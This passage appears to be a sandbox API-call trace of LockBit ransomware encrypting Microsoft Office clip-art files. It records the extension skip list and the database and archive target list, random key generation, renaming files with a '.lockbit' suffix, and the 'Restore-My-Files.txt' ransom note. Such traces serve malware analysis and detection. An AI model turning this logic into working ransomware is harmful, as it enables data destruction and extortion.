(lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.504] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.504] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.504] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.504] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02280_.WMF.lockbit") returned 72 [0167.504] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02280_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02280_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0167.505] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.505] malloc (_Size=0x40068) returned 0x3f70048 [0167.505] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=26920) returned 1 [0167.505] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.506] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0167.506] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.506] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0167.506] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0167.511] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02280_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02280_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.511] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.512] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.513] free (_Block=0x1fa2ed8) [0167.513] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02280_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.513] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.513] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.513] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32fdb00, ftCreationTime.dwHighDateTime=0x1bf3250, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe32fdb00, ftLastWriteTime.dwHighDateTime=0x1bf3250, nFileSizeHigh=0x0, nFileSizeLow=0x7400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02282_.WMF", cAlternateFileName="")) returned 1 [0167.513] lstrcmpiW (lpString1=".", lpString2="PE02282_.WMF") returned -1 [0167.513] lstrcmpiW (lpString1="..", lpString2="PE02282_.WMF") returned -1 [0167.513] PathFindExtensionW (pszPath="PE02282_.WMF") returned=".WMF" [0167.513] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.514] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.515] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.515] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.516] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.516] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.516] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.516] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02282_.WMF") returned 1 [0167.516] lstrcmpiW (lpString1="ntldr", lpString2="PE02282_.WMF") returned -1 [0167.516] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02282_.WMF") returned -1 [0167.516] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02282_.WMF") returned -1 [0167.516] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02282_.WMF") returned -1 [0167.516] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02282_.WMF") returned 1 [0167.516] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02282_.WMF") returned -1 [0167.516] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.516] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02282_.WMF") returned=".WMF" [0167.516] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.516] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.516] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.516] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.516] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.516] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.516] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.516] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.517] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.517] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02282_.WMF.lockbit") returned 72 [0167.518] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02282_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02282_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.519] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.519] malloc (_Size=0x40068) returned 0x3df0008 [0167.519] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=29696) returned 1 [0167.519] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.520] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.521] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.525] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02282_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02282_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.525] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.525] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.527] free (_Block=0x1fa2ed8) [0167.527] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02282_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.527] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.527] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.527] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffb65800, ftCreationTime.dwHighDateTime=0x1bf3488, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xffb65800, ftLastWriteTime.dwHighDateTime=0x1bf3488, nFileSizeHigh=0x0, nFileSizeLow=0x4090, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02285_.WMF", cAlternateFileName="")) returned 1 [0167.527] lstrcmpiW (lpString1=".", lpString2="PE02285_.WMF") returned -1 [0167.527] lstrcmpiW (lpString1="..", lpString2="PE02285_.WMF") returned -1 [0167.527] PathFindExtensionW (pszPath="PE02285_.WMF") returned=".WMF" [0167.527] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.527] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.527] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.527] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.528] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.529] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.529] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02285_.WMF") returned 1 [0167.530] lstrcmpiW (lpString1="ntldr", lpString2="PE02285_.WMF") returned -1 [0167.530] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02285_.WMF") returned -1 [0167.530] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02285_.WMF") returned -1 [0167.530] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02285_.WMF") returned -1 [0167.530] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02285_.WMF") returned 1 [0167.530] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02285_.WMF") returned -1 [0167.530] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.530] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02285_.WMF") returned=".WMF" [0167.530] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.530] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.530] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.530] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.530] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.530] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.530] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.530] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.530] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.530] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.530] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.530] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.530] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.530] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.531] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.531] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02285_.WMF.lockbit") returned 72 [0167.531] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02285_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02285_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.533] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.533] malloc (_Size=0x40068) returned 0x1ff1e60 [0167.533] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=16528) returned 1 [0167.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.534] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0167.534] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.534] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0167.534] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.540] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02285_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02285_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.540] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.540] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.542] free (_Block=0x1fa2ed8) [0167.542] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02285_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.542] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.542] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.542] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6bf9300, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb6bf9300, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x4584, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02287_.WMF", cAlternateFileName="")) returned 1 [0167.542] lstrcmpiW (lpString1=".", lpString2="PE02287_.WMF") returned -1 [0167.542] lstrcmpiW (lpString1="..", lpString2="PE02287_.WMF") returned -1 [0167.542] PathFindExtensionW (pszPath="PE02287_.WMF") returned=".WMF" [0167.542] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.542] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.542] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.542] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.542] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.542] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.542] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.542] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.543] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.543] lstrcmpiW (lpString1=".bat", 